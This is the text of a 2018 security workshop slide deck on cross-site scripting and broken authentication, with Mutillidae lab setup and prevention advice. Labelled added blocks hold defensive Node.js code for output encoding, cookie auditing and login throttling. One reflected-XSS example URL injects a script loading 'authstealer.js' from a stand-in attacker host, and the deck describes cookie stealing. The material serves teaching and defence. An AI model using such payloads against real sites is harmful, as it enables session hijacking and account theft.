Cross-Site Scripting &
Broken Authentication
VodQA Chennai, September 2018
Abinaya V and Agalya D
Agenda
● What is XSS?
● Types of XSS with hands-on
● Cookie stealing
● Prevention of XSS
● Broken Authentication
● Privilege escalation
● Brute force
● Mitigation of Broken Authentication
Cross-Site Scripting
A7:2017-Cross-Site Scripting (XSS)
A3:2013-Cross-Site Scripting (XSS)
What is XSS?
- A client-side code injection attack
- The attacker injects script into a vulnerable web application; the victim's browser then runs that script inside the application's origin, with the victim's session
Consequences
- Steal the user's cookie for the domain
- Scrape or modify page content, bypassing the Same-Origin Policy (the injected script runs in the vulnerable site's own origin)
- Trojan horse programs could be injected
- Gather information from the victim's browser: account details, cookies, other sensitive information
Sites hacked! Example: XSS in eBay
Types of XSS
- Reflected (non-persistent): the payload arrives in the current request and is echoed straight back in the response
- Stored (persistent): the payload is saved by the application and served to every visitor of the affected page
- DOM-based: client-side script itself writes untrusted data (for example from location.hash) into the page; the server never sees the payload
Reflected XSS
The payload travels in the request (here a query parameter) and the server reflects it unencoded into the response, so it fires for whoever follows the crafted link.
Example: http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"></script>
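The reflection above, as an added example that is not code from the slides or from Mutillidae: a Node.js rendering of a search page, with the raw concatenation beside an HTML-entity-encoded version, fed the slide's own URL. The function names are assumptions, and the closing `</script>` is added to make the payload well-formed.

```javascript
// Added example (not code from the slides): how the slide's reflected XSS
// URL becomes a live script tag in the response, and how HTML entity
// encoding of the reflected value stops it. Node.js, no dependencies.

// The slide's URL, with the closing </script> added so the payload is
// well-formed. %20 is a space; the browser percent-encodes the rest as needed.
const SLIDE_URL =
  'http://forum.com?q=news<script%20src="http://hackersite.com/authstealer.js"></script>';

// Extract the query parameter the way a server framework would (URL-decoded).
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Vulnerable: the parameter is concatenated straight into the HTML.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Output encoding for the HTML text and quoted-attribute contexts: every
// character that can end text or an attribute becomes an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, value encoded at the point of output.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Does the HTML contain a live <script> tag (as opposed to its entity-encoded
// text)? Used only to make the difference between the two renderings visible.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Stand-alone demo: run with `node` to see both renderings.
const q = queryParam(SLIDE_URL, 'q');
console.log('vulnerable:', renderSearchVulnerable(q));
console.log('hardened:  ', renderSearchSafe(q));
```

The fix is applied at output, not input: the same value may later be written into a JavaScript string or a URL, where HTML entities are the wrong encoding, so each output context gets its own encoder.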
HANDS-ON
SET-UP INSTRUCTIONS:
Participants using the Mutillidae Docker image:
1. Install Docker
2. Install the Mutillidae app with the Docker command:
docker run -d -p 80:80 -p 443:443 --name owasp17 bltsec/mutillidae-docker
(The image is deliberately vulnerable; on a machine that is reachable from a network, bind it to loopback instead, e.g. -p 127.0.0.1:80:80 -p 127.0.0.1:443:443.)
3. Open the Mutillidae app: http://localhost/mutillidae/
The first time, it redirects to http://localhost/mutillidae/database-offline.php
4. Click "setup/reset the DB" to set up the database
Participants using the VirtualBox OVA image:
1. Access the app using the URL: http://192.168.56.180/mutillidae/index.php?
Change the browser proxy settings so requests pass through an intercepting proxy:
Firefox --> Preferences --> Network proxy --> Settings --> 'Manual Proxy Configuration'
Attack strings
Characters to submit in each input and look for in the response; if any comes back unencoded, the input reaches an HTML or script context:
" > <a ; // %
Stored XSS
1. Attacker injects the bad script into content the application stores (a comment, a profile field, a forum post)
2. Victim requests that content
3. Victim receives the bad script along with the page and the browser runs it
4. The script steals valuable data and sends it to the attacker
HANDS-ON
Cookie stealing
Victim's web application: the malicious script runs when the vulnerable page loads
Attacker's server: receives the cookies when the malicious script runs
How to prevent?
- Vigilance
- Validate input and, above all, encode output for the context it lands in (HTML body, attribute, JavaScript, URL); sanitising input alone misses contexts
- Set the HttpOnly flag on the session cookie in the HTTP response header: injected script can then not read it through document.cookie, although it can still act as the user while the page is open
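The classic cookie-stealing payload sends `document.cookie` to the attacker's server, so the check that matters for the cookie-stealing and prevention slides above is whether the session cookie is kept out of `document.cookie`. Below, as an added example that is not code from the slides or from Mutillidae, is a Node.js audit of Set-Cookie headers for the attributes that limit what a successful XSS can do with the session, plus a builder for a hardened header. The cookie name and values are constructed; the session ID string is the one from the URL-rewriting slide.

```javascript
// Added example (not from the slides): audit Set-Cookie headers for the
// attributes that limit cookie theft and cross-site reuse, show what
// document.cookie would expose to injected script, and build a hardened
// header. Node.js, no dependencies.

// Parse "name=value; Attr; Attr=val" into { name, value, attrs } with
// attribute names lower-cased (they are case-insensitive in RFC 6265).
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Findings for a session cookie; an empty list means it passes.
function auditSessionCookie(header) {
  const { attrs } = parseSetCookie(header);
  const findings = [];
  if (!attrs.httponly) findings.push('missing HttpOnly: document.cookie exposes the session to injected script');
  if (!attrs.secure) findings.push('missing Secure: cookie is also sent over plain HTTP');
  const sameSite = String(attrs.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') findings.push('SameSite not Lax/Strict: cookie rides along on cross-site requests');
  return findings;
}

// What document.cookie would show to script on the page: every cookie the
// app set without HttpOnly. This is exactly what the stealer exfiltrates.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

function buildSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

// Constructed sample headers (cookie name as PHP issues it; value from the slide)
const WEAK_COOKIE = 'PHPSESSID=2P9GC2JSNDLPSKHCJUN5TU; Path=/';
const HARDENED_COOKIE = buildSessionCookie('PHPSESSID', '2P9GC2JSNDLPSKHCJUN5TU');

console.log('weak findings:', auditSessionCookie(WEAK_COOKIE));
console.log('hardened findings:', auditSessionCookie(HARDENED_COOKIE));
console.log('script sees (weak):', visibleToScript([WEAK_COOKIE, 'theme=dark; Path=/']));
console.log('script sees (hardened):', visibleToScript([HARDENED_COOKIE, 'theme=dark; Path=/']));
```

HttpOnly stops the exfiltration shown in the diagram, not the XSS itself: script that cannot read the cookie can still issue requests that carry it, so output encoding remains the primary fix.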
Broken Authentication
A2:2017-Broken Authentication
These weaknesses let an attacker either capture or bypass the authentication methods a web application uses. The goal of the attack is to take over one or more accounts.
● User authentication credentials are not protected when stored
● Predictable login credentials
● Passwords, session IDs and other credentials are sent over unencrypted connections
● The application's session timeout is not set properly
● URL rewriting puts the session ID in the URL, where it leaks through browser history, server logs and the Referer header:
http://site.com/sale;jsessionid=2P9GC2JSNDLPSKHCJUN5TU?dest=Europe
LinkedIn data breach: 50 easily guessed passwords made up more than 2.2 million of the 117 million password hashes exposed in the breach. The passwords were stored as unsalted SHA-1 hashes (not encrypted), so the common ones were recovered quickly.
Source: LeakedSource
Privilege escalation via cookie tampering
If the application stores the user ID or role in a cookie and trusts it as sent, editing the cookie in the browser or an intercepting proxy changes who the application believes you are.
Prevention
- Implement multi-factor authentication to prevent automated credential-stuffing, brute-force and stolen-credential-reuse attacks
- Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force or other attacks are detected
- Do not deploy with any default credentials, particularly for admin users
- Implement weak-password checks, such as testing new or changed passwords against a list of the most common ones
- Have password rotation policies, rotating on evidence of compromise rather than on a fixed schedule (scheduled rotation mostly produces predictable variations of the old password)
- Session IDs should not be in the URL; they should be securely stored and invalidated after logout, idle and absolute timeouts
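The throttling, logging, alerting and weak-password items in the list above, worked through together as an added example that is not code from the slides or from Mutillidae: a Node.js login throttle that delays repeated failures per account with an increasing back-off, locks after a threshold, logs every failure, raises an alert when many different accounts fail inside a short window (the shape of a credential-stuffing run), and rejects passwords from a deny-list. The thresholds, the log format and the deny-list are constructed; the password verifier is injected so the example runs without a user database.

```javascript
// Added example (not from the slides): progressive delay and temporary lock
// for failed logins, audit logging, a credential-stuffing alert, and a
// weak-password check. Node.js; in-memory state, so a real deployment would
// back it with a store shared across instances.

const FREE_FAILURES = 3;        // failures allowed before delays start
const LOCK_AFTER = 10;          // failures before a temporary lock
const LOCK_SECONDS = 900;
const STUFFING_WINDOW_S = 60;   // sliding window for the stuffing detector
const STUFFING_ACCOUNTS = 50;   // distinct accounts failing inside the window

// Constructed deny-list; a real one comes from e.g. SecLists' Passwords/ lists.
const WEAK_PASSWORDS = new Set(['123456', 'password', 'linkedin', '12345678', 'qwerty']);

function passwordAccepted(pw) {
  return pw.length >= 8 && !WEAK_PASSWORDS.has(pw.toLowerCase());
}

class LoginThrottle {
  // `now` returns seconds; injectable so tests can fake the clock.
  constructor(now = () => Date.now() / 1000) {
    this.now = now;
    this.failures = new Map();   // username -> { count, lastFail }
    this.recent = [];            // [time, username] of recent failures
    this.log = [];               // audit lines (constructed format)
  }

  // Seconds this username must wait before another attempt is accepted.
  retryAfter(username) {
    const f = this.failures.get(username);
    if (!f) return 0;
    const since = this.now() - f.lastFail;
    if (f.count >= LOCK_AFTER) return Math.max(0, LOCK_SECONDS - since);
    if (f.count <= FREE_FAILURES) return 0;
    return Math.max(0, 2 ** (f.count - FREE_FAILURES) - since); // 2, 4, 8, ... s
  }

  // `checkPassword(user, pw)` is the real verifier (a bcrypt/argon2 compare).
  attempt(username, password, checkPassword, ip) {
    const wait = Math.ceil(this.retryAfter(username));
    if (wait > 0) {
      // Refused before the password is even checked, so a correct guess
      // inside the delay window tells the attacker nothing.
      this.log.push(`THROTTLED user=${username} ip=${ip} retry_after=${wait}s`);
      return { ok: false, retryAfter: wait };
    }
    if (checkPassword(username, password)) {
      this.failures.delete(username);
      return { ok: true, retryAfter: 0 };
    }
    const f = this.failures.get(username) || { count: 0, lastFail: 0 };
    f.count += 1;
    f.lastFail = this.now();
    this.failures.set(username, f);
    this.recent.push([f.lastFail, username]);
    this.log.push(`LOGIN_FAIL user=${username} ip=${ip} count=${f.count}`);
    if (this.stuffingSuspected()) this.log.push(`ALERT credential_stuffing ip=${ip}`);
    return { ok: false, retryAfter: Math.ceil(this.retryAfter(username)) };
  }

  // Many distinct accounts failing in a short window is the signature of a
  // stuffing run: one or a few passwords tried across a leaked user list.
  stuffingSuspected() {
    const cutoff = this.now() - STUFFING_WINDOW_S;
    this.recent = this.recent.filter(([t]) => t >= cutoff);
    return new Set(this.recent.map(([, u]) => u)).size >= STUFFING_ACCOUNTS;
  }
}

// Stand-alone demo with a fake verifier and a fake clock
let clock = 1000;
const demo = new LoginThrottle(() => clock);
const verify = (u, p) => u === 'alice' && p === 'correct horse';
for (let i = 0; i < 4; i++) demo.attempt('alice', 'wrong', verify, '10.0.0.1');
console.log(demo.attempt('alice', 'correct horse', verify, '10.0.0.1')); // throttled
clock += 3;
console.log(demo.attempt('alice', 'correct horse', verify, '10.0.0.1')); // ok
console.log(demo.log);
```

The per-account delay slows a brute-force run against one user; the cross-account alert is what catches stuffing, where each account sees only one or two failures and per-account limits never trigger.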
References
- https://www.owasp.org/index.php
- https://sourceforge.net/projects/mutillidae/
- https://www.cvedetails.com/about-contact.php
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/
THANKS
Email
abinayav@thoughtworks.com
agalyad@thoughtworks.com
